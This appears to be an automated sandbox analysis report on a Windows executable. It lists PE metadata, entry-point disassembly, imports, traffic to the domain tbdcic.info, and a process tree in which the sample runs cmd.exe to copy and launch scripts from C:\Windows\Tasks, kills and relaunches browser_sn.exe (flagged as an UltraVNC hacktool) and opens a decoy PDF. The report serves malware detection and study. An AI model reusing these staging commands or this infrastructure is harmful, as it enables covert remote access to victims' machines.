                                                                          TLSH:767523547793C9F4EA57227408A15C135FA3ED290A40288F33CDF6127A36652FA2BDB7
                                                                          File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

                                                                          File Icon

                                                                          Icon Hash:357561d6dad24d55

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x41382f
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:1d1577d864d2da06952f7affd8635371

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push FFFFFFFFh
                                                                          push 00416E98h
                                                                          push 004139C0h
                                                                          mov eax, dword ptr fs:[00000000h]
                                                                          push eax
                                                                          mov dword ptr fs:[00000000h], esp
                                                                          sub esp, 68h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [ebp-18h], esp
                                                                          xor ebx, ebx
                                                                          mov dword ptr [ebp-04h], ebx
                                                                          push 00000002h
                                                                          call dword ptr [004151DCh]
                                                                          pop ecx
                                                                          or dword ptr [0041B9E4h], FFFFFFFFh
                                                                          or dword ptr [0041B9E8h], FFFFFFFFh
                                                                          call dword ptr [004151E0h]
                                                                          mov ecx, dword ptr [004199C4h]
                                                                          mov dword ptr [eax], ecx
                                                                          call dword ptr [004151E4h]
                                                                          mov ecx, dword ptr [004199C0h]
                                                                          mov dword ptr [eax], ecx
                                                                          mov eax, dword ptr [004151E8h]
                                                                          mov eax, dword ptr [eax]
                                                                          mov dword ptr [0041B9E0h], eax
                                                                          call 00007F4DECB06F22h
                                                                          cmp dword ptr [00419780h], ebx
                                                                          jne 00007F4DECB06E0Eh
                                                                          push 004139B8h
                                                                          call dword ptr [004151ECh]
                                                                          pop ecx
                                                                          call 00007F4DECB06EF4h
                                                                          push 00419050h
                                                                          push 0041904Ch
                                                                          call 00007F4DECB06EDFh
                                                                          mov eax, dword ptr [004199BCh]
                                                                          mov dword ptr [ebp-6Ch], eax
                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                          push eax
                                                                          push dword ptr [004199B8h]
                                                                          lea eax, dword ptr [ebp-64h]
                                                                          push eax
                                                                          lea eax, dword ptr [ebp-70h]
                                                                          push eax
                                                                          lea eax, dword ptr [ebp-60h]
                                                                          push eax
                                                                          call dword ptr [004151F4h]
                                                                          push 00419048h
                                                                          push 00419000h
                                                                          call 00007F4DECB06EACh

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x1c0000x309f00x30a0064273c62ea7bfbe17a6e55349807dc90False0.7267683563624678data7.231510619965348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                                          RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                                          RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
                                                                          RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                                          RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                                          RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                                          RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                                          RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                                          RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                                          RT_VERSION0x283600x350data0.4693396226415094
                                                                          RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599

                                                                          Imports

                                                                          DLLImport
                                                                          COMCTL32.dll
                                                                          SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                          GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                          ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                          USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                                          ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                          OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                                          KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                                          MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          RussianRussia
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 23, 2024 13:38:24.300333023 CET49723443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:24.300388098 CET44349723194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:24.300476074 CET49723443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:24.300689936 CET49723443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:24.300707102 CET44349723194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:24.300780058 CET44349723194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:24.411041975 CET49724443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:24.411091089 CET44349724194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:24.411174059 CET49724443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:24.411286116 CET49724443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:24.411295891 CET44349724194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:24.411354065 CET44349724194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:41.226389885 CET49725443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:41.226433039 CET44349725194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:41.226522923 CET49725443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:41.227459908 CET49725443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:41.227474928 CET44349725194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:41.227519035 CET44349725194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:41.362751961 CET49726443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:41.362798929 CET44349726194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:41.362900019 CET49726443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:41.366161108 CET49726443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:41.366174936 CET44349726194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:41.366220951 CET44349726194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:52.833266020 CET49727443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:52.833329916 CET44349727194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:52.833415031 CET49727443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:52.833596945 CET49727443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:38:52.833616018 CET44349727194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:38:52.833662987 CET44349727194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:39:15.342473030 CET49729443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:39:15.342518091 CET44349729194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:39:15.342595100 CET49729443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:39:15.342761040 CET49729443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:39:15.342777014 CET44349729194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:39:15.342838049 CET44349729194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:39:49.170277119 CET49733443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:39:49.170310020 CET44349733194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:39:49.170382977 CET49733443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:39:49.170588017 CET49733443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:39:49.170598984 CET44349733194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:39:49.170640945 CET44349733194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:40:33.938652992 CET49734443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:40:33.938688993 CET44349734194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:40:33.938755989 CET49734443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:40:33.938865900 CET49734443192.168.2.8194.190.152.201
                                                                          Dec 23, 2024 13:40:33.938874960 CET44349734194.190.152.201192.168.2.8
                                                                          Dec 23, 2024 13:40:33.938925028 CET44349734194.190.152.201192.168.2.8

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 23, 2024 13:38:18.222908020 CET6527853192.168.2.81.1.1.1
                                                                          Dec 23, 2024 13:38:24.053639889 CET6493153192.168.2.81.1.1.1
                                                                          Dec 23, 2024 13:38:24.192847967 CET53649311.1.1.1192.168.2.8
                                                                          Dec 23, 2024 13:38:37.315371990 CET6051253192.168.2.81.1.1.1
                                                                          Dec 23, 2024 13:38:37.452665091 CET53605121.1.1.1192.168.2.8

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 23, 2024 13:38:18.222908020 CET192.168.2.81.1.1.10xd8e6Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Dec 23, 2024 13:38:24.053639889 CET192.168.2.81.1.1.10x106cStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                          Dec 23, 2024 13:38:37.315371990 CET192.168.2.81.1.1.10xf474Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 23, 2024 13:38:18.443531036 CET1.1.1.1192.168.2.80xd8e6No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 23, 2024 13:38:20.482588053 CET1.1.1.1192.168.2.80x1d17No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Dec 23, 2024 13:38:20.482588053 CET1.1.1.1192.168.2.80x1d17No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Dec 23, 2024 13:38:24.192847967 CET1.1.1.1192.168.2.80x106cNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                          Dec 23, 2024 13:38:37.452665091 CET1.1.1.1192.168.2.80xf474No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:07:38:04
                                                                          Start date:23/12/2024
                                                                          Path:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\T8xrZb7nBL.exe"
                                                                          Imagebase:0x400000
                                                                          File size:1'670'955 bytes
                                                                          MD5 hash:1677BD5B561B890396AE1816066CA481
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:2
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:9
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:10
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:07:38:06
                                                                          Start date:23/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                          Imagebase:0x7ff6e8200000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:12
                                                                          Start time:07:38:06
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:taskkill /f /im browser_sn.exe
                                                                          Imagebase:0x1e0000
                                                                          File size:74'240 bytes
                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:15
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:18
                                                                          Start time:07:38:09
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:07:38:12
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:07:38:14
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
